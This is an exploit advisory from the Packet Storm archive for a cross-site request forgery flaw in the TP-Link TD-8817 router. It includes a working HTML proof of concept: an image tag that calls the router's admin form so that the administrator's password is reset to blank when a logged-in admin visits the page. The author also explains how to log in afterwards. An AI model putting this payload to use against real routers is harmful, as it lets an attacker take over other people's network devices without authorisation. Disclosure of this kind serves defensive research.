what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

TP-Link TD-8817 Cross Site Request Forgery

TP-Link TD-8817 Cross Site Request Forgery
Posted Apr 6, 2013
Authored by Un0wn_X

TP-Link TD-8817 with firmware version 6.0.1 Build 111128 Release 26763 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 75cfe0072867dc13dbeaaa17dc56bfdaf0deec508cea718365799d632ef06968

TP-Link TD-8817 Cross Site Request Forgery

Change Mirror Download
======================================================================
_ _ _____ __ __
| | | | | _ | \ \ / /
| | | |_ __ | |/' |_ ___ __ \ V /
| | | | '_ \| /| \ \ /\ / / '_ \ / \
| |_| | | | \ |_/ /\ V V /| | | | / /^\ \
\___/|_| |_|\___/ \_/\_/ |_| |_| \/ \/
______
|______|
======================================================================
######################################################################
# Exploit Title: TP-Link TD-8817 CSRF Vulnerability
# Author: Un0wn_X
# E-mail: unownsec@gmail.com
# Category: Hardware
# Google Dork: N/A
# Vendor: http://www.tp-link.com
# Version: TD-W8901G
# Firmware Version: 6.0.1 Build 111128 Rel.26763
# Product: http://www.tp-link.com/lk/products/details/?model=TD-8817
# Tested on: Windows 7 64-bit
# PoC video: http://www.youtube.com/watch?v=8xJGkRQB0QM
######################################################################

#Introduction
==============
TP-Link TD-8817 is a ADSL2+ Ethernet/USB Modem Router which works with a 24-Mbps downstream connection.

#Description of Vulnerability
=============================
You can easily change the default user's (admin) password by the default router page listning on tcp/ip port 80. In here you the $_GET will change the password for you and the $_POST request method is not needed for changing the router pass.

#Exploit
========

<html>
<!-- TP-Link TD-8817 CSRF Explpoit -->
<body>
<img src="http://192.168.1.1/Forms/tools_admin_1"/>
</body>
</html>

==========
Save this as csrf.html and this will change the router password to blank if the current user admin visits this page his password will be resetted to blank. You can login with the username admin and password (blank).

#Greetz to G2, Zer0Freak, HR aka MrGreen, Divine, Keeper,SubZer0, zer0time, Zer0wl, Cyb_iDioT, Prominent, Raw-x, Kasper










Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    47 Files
  • 25
    Jul 25th
    31 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close